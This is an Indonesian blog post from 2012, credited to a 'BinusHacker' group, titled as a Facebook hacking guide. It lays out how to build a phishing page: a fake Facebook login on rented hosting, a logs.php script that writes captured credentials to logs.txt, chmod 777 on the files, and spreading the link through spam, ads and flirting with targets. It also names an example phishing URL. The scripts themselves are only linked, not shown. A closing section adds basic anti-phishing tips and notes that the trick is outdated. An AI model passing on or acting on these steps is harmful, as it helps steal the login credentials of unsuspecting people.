Friday, September 7, 2012

Cara Hack Facebook Terbaru

Hello semua bagaimana Cara Hack Facebook Terbaru ?. Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!

Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya:

1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html“, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html

Bikin Code Sesuai Dengan Contoh Script Dibawah Ini:

Scriptcode pada no 1:

Klick Disini Untuk Lihat Scriptnya

2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.

Scriptcode pada no 2:

Klick Disini Untuk Lihat Scriptnya


3. Jangan lupa dan wajib untuk membuat file kosong yg berformat txt dengan nama: logs.txt – jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt

4. Ini wajib dan harus diingat! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.


5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya! :D


6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.

Contoh tampilan ujicoba aplikasi websitenya disini:

http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html

Selamat Mencoba, Semoga Berhasil..

Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah. Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->

Accessories -> Accessibility -> ‘On-Screen Keyboard’

Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files

-> Accessories -> Accessibility -> ‘On-Screen Keyboard’


4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak “Remember me” pada saat login, karena hal itu dapat menyimpan username dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. Kekekeke..

Presented by BinusHacker Family

Tutorial Creator: Zian @ BinusHacker
Edited & Reviewed by UtuH @ BinusHacker
For: All BinusHacker Member & Internet Stuff

Update!!! Trik ini sudah "usang" (nggak bekerja) jadi bagi sobat yang mau nyoba, mending nggak usah.

Cara Hack Facebook Terbaru Rating: 4.5 Diposkan Oleh: Situs Berkualitas